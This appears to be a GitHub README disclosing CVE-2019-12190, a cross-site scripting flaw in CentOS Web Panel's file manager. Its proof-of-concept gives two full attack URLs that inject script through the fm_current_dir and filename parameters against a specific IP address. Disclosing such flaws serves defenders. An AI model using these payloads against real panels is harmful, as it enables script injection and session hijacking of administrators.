Skip to content
CVE-2019-12190 - CentOS-WebPanel XSS vulnerability
Branch: master
Clone or download
Latest commit f19c2c5 May 20, 2019
Permalink
Type Name Latest commit message Commit time
Failed to load latest commit information.
README.md

README.md

CVE-2019-12190

CVE-2019-12190 - CentOS-WebPanel XSS vulnerability

Information Description:XSS was discovered in CentOS-WebPanel.com (aka CWP) CentOS Web Panel through 0.9.8.747 via the testacc/fileManager2.php fm_current_dir parameter.

Researcher: Enter of VinCSS (Vingroup)

Proof-of-concept

  1. Login into the CentOS Web Panel using user credential. https://79.137.25.230:2083
  2. Access link https://79.137.25.230:2083/cwp_3633e125a390bd3d/testacc/fileManager2.php? frame=2&fm_current_dir=/%3C/script%3E%3Cscript%3Ealert(XSS);%3C/script%3E or https://79.137.25.230:2083/cwp_3633e125a390bd3d/testacc/fileManager2.php?action=7&fm_current_dir=/home/testacc/&filename=%3Cscript%3Ealert(%27XSS%27)%3C/script%3E
You can’t perform that action at this time.